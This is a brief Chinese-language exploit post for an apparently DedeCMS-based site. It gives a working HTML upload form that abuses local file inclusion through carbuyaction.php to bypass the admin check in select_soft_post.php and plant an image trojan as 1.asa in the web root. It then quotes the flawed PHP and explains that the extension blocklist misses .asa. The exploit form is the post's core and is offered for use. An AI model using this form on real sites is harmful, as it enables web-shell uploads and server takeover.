本地包含的利用方法。
<form action=”http://www.ra1nker/plus/carbuyaction.php?dopost=return&action=xxx&code=../../include/dialog/select_soft_post” method=”post” enctype=”multipart/form-data” name=”QuickSearch” id=”QuickSearch”> <input type=”hidden” name=”newname” value=”1.asa”> <input type=”file” name=”uploadfile”> <input type=”submit” value=”搜索” name=”QuickSearchBtn”> </form>
上传一个图片木马(只改后辍名为图片类型就行),即可在网站根目录生成 1.asa 文件 简单分析: 文件:select_soft_post.php
01.if(!isset($cfg_basedir)) 02.{ 03.include_once(dirname(__FILE__).’/config.php’); 04.} 05.//config.php 是用于验证是否管理员。由于本地包含, $cfg_basedir 已经设置了值,应该跳过了验证。 06.//文件名(前为手工指定, 后者自动处理) 07.if(!empty($newname)) 08.{ 09.$filename = $newname; 10.if(!ereg(“\.”, $filename)) $fs = explode(‘.’, $uploadfile_name); 11.else $fs = explode(‘.’, $filename); 12.if(eregi($cfg_not_allowall, $fs[count($fs)-1])) 13.{ 14.ShowMsg(“你指定的文件名被系统禁止!”,’javascript:;’); 15.exit(); 16.} 17.if(!ereg(“\.”, $filename)) $filename = $filename.’.’.$fs[count($fs)-1]; 18.}else{ 19.$filename = $cuserLogin->getUserID().’-’.dd2char(MyDate(‘ymdHis’,$nowtme)); 20.$fs = explode(‘.’, $uploadfile_name); 21.if(eregi($cfg_not_allowall, $fs[count($fs)-1])) 22.{ 23.ShowMsg(“你上传了某些可能存在不安全因素的文件,系统拒绝操作!”,’javascript:;’); 24.exit(); 25.} 26.$filename = $filename.’.’.$fs[count($fs)-1]; 27.} 问题就出在 $newname 那里,没验证上传类型,但验证了非可上传类型
01.//这里强制限定的某些文件类型禁止上传 02.$cfg_not_allowall = “php|pl|cgi|asp|aspx|jsp|php3|shtm|shtml”; 即可以上传非上面类型的文件,有时也并不鸡肋。。
|